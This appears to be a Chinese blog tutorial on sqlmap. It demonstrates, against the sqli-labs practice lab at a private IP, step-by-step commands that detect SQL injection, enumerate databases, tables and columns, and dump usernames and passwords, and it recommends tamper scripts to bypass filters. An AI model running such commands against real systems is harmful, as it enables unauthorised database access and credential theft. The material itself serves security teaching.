标签:sqlmap 数据库 technique 192.168 sqlin 使用 注入
sqlmap----注入神器
sqlmap是一个开源的渗透测试工具,可以自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎,为终极渗透测试仪提供了许多利基功能,以及从数据库指纹识别,从数据库中获取数据到访问底层文件系统以及在操作系统上执行命令的各种交换机。
sqlmap支持的数据库:
MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,Informix,HSQLDB和H2
sqlmap基本参数:
--update 更新升级
--dbms 指定数据库类型
--users 列举数据库用户
--dbs 列举数据库
--passwords 列举数据库用户密码
--reg-read 读取win系统注册表
这里以sqlin-labs-master演示sqlmap的使用方法:
检测是否可以注入:
sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1
接下来开始注入,指定注入方法用报错注入,爆数据库名称:
sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E --current-db
爆数据表:
sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E -D security --tables
爆字段:
sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E -D security -T users --columns
报数据:
sqlmap.py -u http://192.168.81.128/sqlin/Less-2/?id=1 --technique E -D security -T users -C username,password --dump
以上所用到的参数有:
--technique 指定注入方法
B Boolean-based blind(布尔盲注)
E Error-based(报错注入)
U Union query-based(联合注入)
T Time-based blind(时间注入)
--current-user 获取当前用户
--current-db 获取当前数据库名称
--tables 获取表名
--columns 获取列名
--dump 获取数据
最后说一个特别牛X的参数:--tamper 自带脚本绕过(也可以自己添加)
标签:sqlmap,数据库,technique,192.168,sqlin,使用,注入 来源: https://www.cnblogs.com/awrrays/p/11311355.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。